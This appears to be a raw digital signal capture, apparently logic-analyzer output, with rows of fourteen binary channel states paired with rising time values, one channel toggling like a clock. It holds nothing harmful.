1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348704e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348904e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3348956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3348980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349104e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349180e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349600e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349776e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3349924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3349976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350000e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350148e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350176e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350200e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350324e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350348e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350376e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350400e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350548e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350776e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3350948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3350976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351000e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351148e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351200e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351324e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351348e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351376e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351400e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351548e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351600e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351748e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351776e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351800e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351924e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3351948e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3351976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352000e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352076e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352100e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352200e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352400e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352548e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352576e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352748e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352776e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352800e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3352924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3352976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353000e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353148e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353324e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353348e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353376e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353400e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353548e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353600e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353776e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353800e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3353972e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3353996e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354048e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354072e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354148e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354196e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354224e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354372e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354424e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354448e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354548e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354572e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354596e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354620e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354648e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354672e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354748e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354772e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354796e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354820e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354848e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354872e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3354972e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3354996e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355048e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355072e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355148e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355172e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355196e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355220e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355248e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355272e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355372e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355396e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355420e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355448e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355472e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355548e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355572e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355596e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355620e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355648e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355672e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.3355700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.3355724e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,2.3355728e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,2.3479604e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.3479796e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3479820e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,2.3479836e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3479864e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3480160e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3480184e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3480208e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3480236e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3480260e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3480284e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3480308e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3480332e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.3480356e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.3480384e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480436e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480460e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3480464e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3480468e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3480484e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3480508e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480516e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480560e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480584e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480608e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480636e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480660e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480684e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480708e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480732e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480804e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3480828e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3480852e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3480884e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3480908e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3480932e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3480956e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481056e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481064e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481076e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481100e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481124e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481148e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481168e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481188e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481212e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481236e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481340e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481364e-02 0,1,0,0,0,0,0,0,0,1,0,0,1,0,2.3481388e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481392e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481420e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481464e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481484e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481508e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481532e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481556e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481576e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481596e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481620e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3481644e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3481688e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481720e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481732e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481780e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481824e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481868e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481892e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481916e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481936e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3481956e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3481980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482004e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482028e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482048e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482072e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482092e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482100e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482116e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482144e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482196e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482220e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482244e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482292e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482316e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482344e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482368e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3482372e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482376e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482468e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482492e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482516e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482544e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482568e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482596e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482620e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482644e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482716e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482724e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3482768e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3482796e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3482800e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482820e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482844e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482868e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482892e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482944e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3482968e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3482996e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483044e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483092e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483116e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483144e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483168e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483196e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483268e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483292e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483344e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483372e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483396e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483468e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483500e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483524e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483548e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483572e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483596e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3483604e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3483652e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3483676e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3483680e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483684e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483700e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483748e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483776e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483800e-02 